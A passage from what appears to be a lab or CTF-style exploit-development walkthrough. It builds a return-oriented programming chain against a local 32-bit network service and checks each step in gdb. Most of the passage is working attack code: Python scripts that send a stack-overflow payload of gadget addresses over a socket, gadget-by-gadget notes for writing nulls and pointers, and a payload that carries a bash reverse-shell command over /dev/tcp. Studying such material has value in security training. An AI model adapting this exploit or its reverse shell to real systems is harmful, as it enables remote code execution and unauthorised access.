38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "A" * 904 # 1000 - 96 (96 is the current size of the payload from the second ROP gadget

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

This time I will set the breakpoint at 0x08083f21 and ensure everything is correct:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
(gdb) delete 1
(gdb) break *0x08083f21
Breakpoint 2 at 0x8083f21
(gdb) display/x $ebx
3: /x $ebx = 0x0
(gdb) display/x $edx
4: /x $edx = 0xbfffe740
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 

0xbfffe7a4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7b4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7c4: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 2, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb80
0xbfffeb80: 0xffffffff
(gdb) stepi
0xbfffe7a4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7b4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7c4: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb80
0xbfffeb80: 0x00000000
(gdb) x/xw 0xbfffeb7c
0xbfffeb7c: 0xdddddddd
(gdb) x/xw 0xbfffeb78
0xbfffeb78: 0xcccccccc
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbbbbbbbb

As you can see, we've successfully written nulls where the f's used to be at the end of our data.

After, I've printed the 3 values further up our payload (which are just where our pointers will be) just to show that it is infact the correct address we are writing to.

Now that we've fixed the nulls at the bottom, the next problem we should approach is setting the value for the ecx register, as this will be the second most difficult challenge.

Setting ECX

The gadget that I felt was the best chance of getting a value into ecx is:

1
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret

ecx needs to contain the address of the beginning of our pointers in the data, where we have put 0xbbbbbbbb.

There is a big problem here, this code will jump to the fixed address 0x804dca1 if the value pointed to by eax does not contain 0.

This means we first have to write 0 there before we can set ecx.

We will use the exact same method that we just used to write 0 to the end of the data, except this time we will calculate the address relative to the current value of edx (the end of the data section).

We use the following series of ROP gadgets to do this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret

We've used all of these gadgets already so unless we miscalculate the distance somewhere this should all work fine and we can run the other gadget to set ecx.

Once we run the gadget to move eax into ecx the value of ecx is set and will no longer need to be touched, this also means we cannot run any gadgets that alter ecx in anyway.

Calculating The Address Of A String And Setting The Pointer

As we already have the address of the first pointer in edx we might as well set this to the correct value.

This should contain the address of the string ////bin/bash, which is the first string in the data section.

If you work it out you will see that the start of the relevant string is 18 double words, or 72 bytes, from the current value of edx (and ecx).

We can now use the exact same gadgets that we've already used to calculate the address of the string and write it to the location pointed to by edx:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret

Now would be a good time to test the exploit again.

At the end of this we expect ecx and edx to point to the beginning of our pointers, eax should point to our ////bin/bash string which should also be wirrten to the address that ecx and edx points to.

We have also wirtten nulls at the end of our data (but we haven't changed this code and we've already tested it so that should work fine unless we've made a calculation error).

Here is the updated notes:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- write nulls to the end of our data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804
dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
---------------------------------------------------- ecx contains the address of ////bin/bash pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

This is our updated exploit:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the distance to the end of the payload

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write 0 to the end of the data

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the distance to 0xbbbbbbbb

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Move address value into ecx

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xa2\xdc\x04\x08" # ecx = eax
payload += "\xee\xee\xee\xee"

############### Work out the distance to ////bin/bash string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x62\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of ////bin/bash string and write to pointer

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

payload += "A" * (1000 - (len(payload) - 540)) # 1000 - current size of the payload from the second ROP gadget

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

When we test this we want to break at 0x08083f21, but there are 3 times we are using this gadget so we should continue through the first 2 and then check the values:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
(gdb) delete 2
(gdb) break *0x08083f21
Breakpoint 3 at 0x8083f21
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffe7a4: 0x080a8576  0xaaaaaaaa  0x08057b7e  0xaaaaaa9e
0xbfffe7b4: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080535be
0xbfffe7c4: 0xeeeeeeee  0xeeeeeeee
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) continue
Continuing.
0xbfffe7f4: 0x0807abcc  0x0804dca2  0xeeeeeeee  0x080a8576
0xbfffe804: 0xaaaaaaaa  0x08057b7e  0xaaaaaa62  0x080748fc
0xbfffe814: 0xeeeeeeee  0xeeeeeeee
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) continue
Continuing.
0xbfffe83c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe84c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe85c: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb2c
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0x00000000
(gdb) stepi
0xbfffe83c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe84c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe85c: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb2c
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash\377\377\377\377\377\377-c\377\377\377\377/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1\377\377\377\377,\353\377\277\314\314\314\314\335\335\335", <incomplete sequence \335>

Clearly we can see that we have written the correct address to the pointer and it now points to the correct string.

The reason we have the rest of the stuff there is because the examine command (x) in gdb when printing a string (x/s) stops when the first null is reached and we haven't changed the null termination to the end of the string yet.

Calculating And Writing The Remaining Nulls

We should now go about writing the nulls to the relevant parts in our data, we still have 3 nulls to write, 1 to terminate each of the string arguments.

I will not walk through each of these because I will use the exact same method but it is important to test the exploit at regular intevals to ensure you aren't miscalculating any values because if you do that it will spoil the rest of the exploit.

If it isn't obvious by now, what I'm doing is using edx as a pointer to where I want to write, using eax and ebx to work out the distance from the current value of edx to the next value, then calculating the address of the next value and finally moving that value into edx and writing zero to it.

Here are my notes updated to the point where all of the nulls have been set:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- write nulls to the end of our data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804
dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
---------------------------------------------------- ecx contains the address of ////bin/bash pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- ////bin/bash pointer now contains the correct address of ////bin/bash
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from ////bin/bash pointer to nearest null termination
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to null termination of 3rd arg
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of null termination of 3rd arg
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- 3rd arg nulls now contain 4 nulls
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa7a : (0xaaaaaaaa - 48) = distance from edx to next nulls
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance from edx to -c nulls
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of -c nulls
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- -c nulls now contain 4 nulls
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa2 : (0xaaaaaaaa - 8) = distance from edx to next nulls
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the last nulls from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of last nulls
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0805638b : mov edi, edx ; ret
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- last nulls now contain 4 nulls

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

At this point all of our strings should be correctly null terminated.

Let's test this, I won't post the exploit script to try and keep the size of this post down a little but all I've done is put the relevant values into the script in the order I've put them in my notes.

To make it easier to break at the end I've put a gadget that I haven't use elsewhere (at 0x808456c) so that I can just break at the end and inspect memory:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
(gdb) delete 3
(gdb) break *0x0808456c
Breakpoint 4 at 0x808456c
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffe930: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe940: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe950: 0x41414141  0x41414141
=> 0x808456c <_dl_get_origin+28>:   mov    ecx,esi

Breakpoint 4, 0x0808456c in _dl_get_origin ()
4: /x $edx = 0xbfffeb38
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) display/x $ecx
5: /x $ecx = 0xbfffeb74
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash"
(gdb) x/s 0xbfffeb2c + 18
0xbfffeb3e:  "-c"
(gdb) x/s 0xbfffeb2c + 18 + 6
0xbfffeb44:  "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

So our 3 strings are now correctly null terminated.

